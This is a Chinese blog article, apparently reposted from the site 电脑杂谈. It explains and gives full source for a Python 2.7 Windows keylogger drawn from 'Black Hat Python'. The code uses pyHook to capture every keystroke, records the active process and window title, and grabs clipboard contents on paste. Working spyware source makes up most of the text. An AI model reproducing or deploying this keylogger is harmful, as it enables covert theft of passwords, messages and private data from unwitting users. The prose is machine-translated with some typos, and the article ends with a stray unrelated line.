源代码非常简单,主要是python black hat中键盘记录程序的内容。
操作系统环境为win10 64位,环境为python 2. 7,
使用的第三方库是pyHook,pythoncom,win32clipboard。这三篇图书馆文章的结尾处都有资源。
先看看跑步效果

从上图可以清楚地看到,我首先在记事本中键入一些文本,然后打开Edge浏览器并在百度中搜索某些内容。
下面是源代码
# coding=utf-8
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# 获得前台窗口句柄
hwnd = user32.GetForegroundWindow() #1
# 获得进程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid)) #2
# 保存当前的进程ID
process_id = "%d" % pid.value
# 申请内存
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid) #3
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) #4
# 读取窗口标题
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512) #5
# 输出进程相关信息
print
print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value) #6
print
# 关闭句柄
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
在第一部分中,定义了一些变量和函数get_current_process()。
此功能的功能是获取当前活动的窗口和相应的进程ID。
在此功能中。
#1首先调用GetForeGroundWindow函数。返回桌面上当前活动窗口的句柄。
#2使用上面获得的句柄作为参数调用GetWindowThreadProcessId。它返回相应的进程ID。
#3打开进程并返回当前的进程句柄。

#4使用返回的句柄获取与该进程相对应的可执行文件的名称。
#5通过调用GetWindowTextA函数获取显示在窗口标题栏中的文本字符。
#6通过格式化过程输出所有信息。
接下来,完成键盘记录程序的核心代码
def KeyStroke(event):
global current_window
# 检查目标是否切换了窗口
if event.WindowName != current_window: #1
current_window = event.WindowName
get_current_process()
# 检测按键是否为常规按键(非组合键等)
if event.Ascii > 32 and event.Ascii < 127: #2
print chr(event.Ascii),
else:
# 如果输入为CTRV-V,则获得剪贴板内容
if event.Key == "V": #3
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE] - %s" % (pasted_value),
else:
print "[%s]" % event.Key,
# 返回直到下一个钩子事件被触发
return True
# 创建和注册钩子函数管理器
kl = pyHook.HookManager() #4
kl.KeyDown = KeyStroke #5
# 注册键盘记录的钩子,然后永久执行
kl.HookKeyboard() #6
pythoncom.PumpMessages()
#4定义pyHook的HookManager。
#5将自定义回调函数KetStroke与KeyDown事件绑定。

#6通过PyHook挂钩所有关键事件。当目标按下键盘上的一个键时,将调用KeyStroe函数,其参数是触发事件的对象。
#1我们需要在此功能中做的第一件事是检查用户是否已切换窗口。如果切换了窗口,则需要检索当前窗口的名称和过程信息。
#2我们检查密钥是否在可输出的ASCII码范围内。如果是,请输出。如果该键是修饰键(例如Shift / Ctrl或Alt)或其他非标准键,则该键的名称将从事件的对象中提取。
#3我们检查用户是否正在执行粘贴操作,如果是,则提取剪贴板中的内容。
最后,回调函数返回True,以允许执行队列中的下一个钩子事件。
其中使用的第三方库和源代码
下载
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/bofangqi/article-362436-1.html
那个愿意搞个合娶